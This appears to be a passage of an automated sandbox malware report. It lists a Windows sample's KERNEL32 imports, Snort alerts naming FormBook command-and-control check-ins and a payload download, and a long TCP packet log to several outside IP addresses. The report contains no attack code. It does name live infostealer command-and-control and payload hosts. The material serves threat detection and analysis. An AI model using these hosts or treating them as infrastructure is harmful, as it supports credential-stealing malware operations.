KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.11.2038.163.115.13149855802031453 04/11/23-09:50:54.919147	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49855	80	192.168.11.20	38.163.115.131
192.168.11.2034.138.169.849844802018752 04/11/23-09:48:14.448694	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49844	80	192.168.11.20	34.138.169.8
192.168.11.2038.163.115.13149855802031412 04/11/23-09:50:54.919147	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49855	80	192.168.11.20	38.163.115.131
192.168.11.2038.163.115.13149855802031449 04/11/23-09:50:54.919147	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49855	80	192.168.11.20	38.163.115.131

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 11, 2023 09:48:14.284379005 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.448247910 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.448462963 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.448693991 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.611119986 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.611736059 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.611812115 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.611870050 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.611923933 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.611954927 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.611979008 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.612071037 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.612118006 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.612145901 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.612201929 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.612251043 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.612251043 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.612255096 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.612341881 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.612453938 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.612624884 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.612624884 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.612624884 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.775022984 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775104046 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775162935 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775216103 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775269032 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775321007 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775412083 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.775419950 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775500059 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775554895 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775580883 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.775609016 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775662899 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775713921 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775753975 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.775753975 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.775753975 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.775768995 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775824070 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775876045 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775923014 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.775928020 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.775980949 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.776034117 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.776086092 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.776093960 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.776093960 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.776140928 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.776268005 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.776453972 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.776453972 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.938591003 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.938640118 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.938677073 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.938711882 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.938745975 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.938779116 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.938781023 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.938817024 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.938852072 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.938888073 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.938921928 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.938949108 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.938956976 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.938992023 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939026117 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939062119 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939095974 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939124107 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.939124107 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.939124107 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.939130068 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939167976 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939203024 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939237118 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939270973 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939291954 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.939306021 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939342022 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939376116 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939409971 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939445019 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939462900 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.939462900 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.939462900 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.939479113 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939513922 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939587116 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939631939 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.939637899 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939673901 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939709902 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939753056 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.939753056 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.939753056 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.939773083 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939817905 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939853907 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939888000 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939923048 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939924955 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.939958096 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.939991951 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.940026045 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.940061092 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:14.940094948 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.940094948 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.940094948 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.940259933 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:14.940429926 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.102238894 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102268934 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102291107 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102312088 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102332115 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102353096 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102374077 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102394104 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102413893 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102435112 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102454901 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102475882 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102495909 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102566957 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.102566957 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.102576017 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102579117 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102580070 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102581024 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102602005 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102622986 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102643013 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102664948 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102730989 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.102744102 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102746010 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102746964 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102747917 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102768898 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102790117 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102809906 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102828979 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102849007 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102869987 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102890968 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102904081 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.102904081 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.102911949 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102931976 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102952957 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102972984 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.102993011 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103013039 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103033066 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103053093 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103070974 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.103070974 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.103074074 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103095055 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103115082 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103136063 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103156090 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103176117 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103197098 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103216887 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103236914 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103240967 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.103257895 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103277922 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103297949 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103317976 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103338003 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103358030 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103379011 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103399038 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103398085 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.103398085 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.103420019 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103440046 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103461027 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103481054 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103499889 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103519917 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103539944 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103559971 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103580952 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103585958 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.103601933 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103622913 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103642941 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103662968 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103683949 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103703976 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103724003 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103744030 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103753090 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.103753090 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.103753090 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.103764057 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103785038 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103805065 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103826046 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:15.103887081 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.104057074 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.104057074 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:15.104226112 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:19.940159082 CEST	80	49844	34.138.169.8	192.168.11.20
Apr 11, 2023 09:48:19.940296888 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:32.581113100 CEST	49844	80	192.168.11.20	34.138.169.8
Apr 11, 2023 09:48:58.078679085 CEST	49804	443	192.168.11.20	2.23.209.29
Apr 11, 2023 09:48:58.089451075 CEST	443	49804	2.23.209.29	192.168.11.20
Apr 11, 2023 09:48:58.089545965 CEST	443	49804	2.23.209.29	192.168.11.20
Apr 11, 2023 09:48:58.089704037 CEST	49804	443	192.168.11.20	2.23.209.29
Apr 11, 2023 09:48:58.089768887 CEST	49804	443	192.168.11.20	2.23.209.29
Apr 11, 2023 09:49:13.188976049 CEST	49847	80	192.168.11.20	198.54.117.218
Apr 11, 2023 09:49:13.353156090 CEST	80	49847	198.54.117.218	192.168.11.20
Apr 11, 2023 09:49:13.353391886 CEST	49847	80	192.168.11.20	198.54.117.218
Apr 11, 2023 09:49:13.353463888 CEST	49847	80	192.168.11.20	198.54.117.218
Apr 11, 2023 09:49:13.517699957 CEST	80	49847	198.54.117.218	192.168.11.20
Apr 11, 2023 09:49:13.517764091 CEST	80	49847	198.54.117.218	192.168.11.20
Apr 11, 2023 09:49:31.865200043 CEST	49849	80	192.168.11.20	185.53.179.91
Apr 11, 2023 09:49:31.884762049 CEST	80	49849	185.53.179.91	192.168.11.20
Apr 11, 2023 09:49:31.884989977 CEST	49849	80	192.168.11.20	185.53.179.91
Apr 11, 2023 09:49:31.904601097 CEST	80	49849	185.53.179.91	192.168.11.20
Apr 11, 2023 09:49:31.904742002 CEST	49849	80	192.168.11.20	185.53.179.91
Apr 11, 2023 09:49:31.924292088 CEST	80	49849	185.53.179.91	192.168.11.20
Apr 11, 2023 09:49:31.924421072 CEST	80	49849	185.53.179.91	192.168.11.20
Apr 11, 2023 09:49:31.924498081 CEST	80	49849	185.53.179.91	192.168.11.20
Apr 11, 2023 09:49:31.924902916 CEST	49849	80	192.168.11.20	185.53.179.91
Apr 11, 2023 09:49:31.944432020 CEST	80	49849	185.53.179.91	192.168.11.20
Apr 11, 2023 09:49:52.479640007 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:52.594683886 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:52.594898939 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:52.595052958 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:52.939524889 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.095688105 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.097510099 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.439363003 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.550240040 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.813477993 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.813597918 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.813713074 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.813756943 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.813756943 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.813807964 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.813878059 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.813900948 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.813983917 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.814003944 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.814107895 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.814131975 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.814207077 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.814208031 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.814291954 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.814311981 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.814419985 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.814481020 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.814522982 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.814568996 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.814677000 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.872709036 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.872972012 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:49:53.920515060 CEST	80	49850	204.11.56.48	192.168.11.20
Apr 11, 2023 09:49:53.920769930 CEST	49850	80	192.168.11.20	204.11.56.48
Apr 11, 2023 09:50:13.264904022 CEST	49852	80	192.168.11.20	3.64.163.50
Apr 11, 2023 09:50:13.276119947 CEST	80	49852	3.64.163.50	192.168.11.20
Apr 11, 2023 09:50:13.276350021 CEST	49852	80	192.168.11.20	3.64.163.50
Apr 11, 2023 09:50:13.276426077 CEST	49852	80	192.168.11.20	3.64.163.50
Apr 11, 2023 09:50:13.287475109 CEST	80	49852	3.64.163.50	192.168.11.20
Apr 11, 2023 09:50:13.287537098 CEST	80	49852	3.64.163.50	192.168.11.20
Apr 11, 2023 09:50:13.287585020 CEST	80	49852	3.64.163.50	192.168.11.20
Apr 11, 2023 09:50:13.287878036 CEST	49852	80	192.168.11.20	3.64.163.50
Apr 11, 2023 09:50:13.287878990 CEST	49852	80	192.168.11.20	3.64.163.50
Apr 11, 2023 09:50:13.299062967 CEST	80	49852	3.64.163.50	192.168.11.20
Apr 11, 2023 09:50:33.799936056 CEST	49854	80	192.168.11.20	64.246.164.134
Apr 11, 2023 09:50:33.955569029 CEST	80	49854	64.246.164.134	192.168.11.20
Apr 11, 2023 09:50:33.955873966 CEST	49854	80	192.168.11.20	64.246.164.134
Apr 11, 2023 09:50:33.955936909 CEST	49854	80	192.168.11.20	64.246.164.134
Apr 11, 2023 09:50:34.152463913 CEST	80	49854	64.246.164.134	192.168.11.20
Apr 11, 2023 09:50:34.242472887 CEST	80	49854	64.246.164.134	192.168.11.20
Apr 11, 2023 09:50:34.242536068 CEST	80	49854	64.246.164.134	192.168.11.20
Apr 11, 2023 09:50:34.242875099 CEST	49854	80	192.168.11.20	64.246.164.134
Apr 11, 2023 09:50:34.242875099 CEST	49854	80	192.168.11.20	64.246.164.134
Apr 11, 2023 09:50:34.398449898 CEST	80	49854	64.246.164.134	192.168.11.20
Apr 11, 2023 09:50:54.720336914 CEST	49855	80	192.168.11.20	38.163.115.131
Apr 11, 2023 09:50:54.918849945 CEST	80	49855	38.163.115.131	192.168.11.20
Apr 11, 2023 09:50:54.919078112 CEST	49855	80	192.168.11.20	38.163.115.131
Apr 11, 2023 09:50:54.919147015 CEST	49855	80	192.168.11.20	38.163.115.131
Apr 11, 2023 09:50:55.119823933 CEST	80	49855	38.163.115.131	192.168.11.20
Apr 11, 2023 09:50:55.119865894 CEST	80	49855	38.163.115.131	192.168.11.20
Apr 11, 2023 09:50:55.120136023 CEST	49855	80	192.168.11.20	38.163.115.131
Apr 11, 2023 09:50:55.120136023 CEST	49855	80	192.168.11.20	38.163.115.131
Apr 11, 2023 09:50:55.318414927 CEST	80	49855	38.163.115.131	192.168.11.20
Apr 11, 2023 09:51:15.924231052 CEST	49857	80	192.168.11.20	160.121.87.199
Apr 11, 2023 09:51:16.188601971 CEST	80	49857	160.121.87.199	192.168.11.20
Apr 11, 2023 09:51:16.188910961 CEST	49857	80	192.168.11.20	160.121.87.199
Apr 11, 2023 09:51:16.188972950 CEST	49857	80	192.168.11.20	160.121.87.199
Apr 11, 2023 09:51:16.457397938 CEST	80	49857	160.121.87.199	192.168.11.20
Apr 11, 2023 09:51:16.457477093 CEST	80	49857	160.121.87.199	192.168.11.20
Apr 11, 2023 09:51:16.457530975 CEST	80	49857	160.121.87.199	192.168.11.20
Apr 11, 2023 09:51:16.457873106 CEST	49857	80	192.168.11.20	160.121.87.199
Apr 11, 2023 09:51:16.457873106 CEST	49857	80	192.168.11.20	160.121.87.199
Apr 11, 2023 09:51:16.722553015 CEST	80	49857	160.121.87.199	192.168.11.20
Apr 11, 2023 09:51:34.768409014 CEST	49859	80	192.168.11.20	66.29.154.110
Apr 11, 2023 09:51:35.776360989 CEST	49859	80	192.168.11.20	66.29.154.110
Apr 11, 2023 09:51:37.776211977 CEST	49859	80	192.168.11.20	66.29.154.110
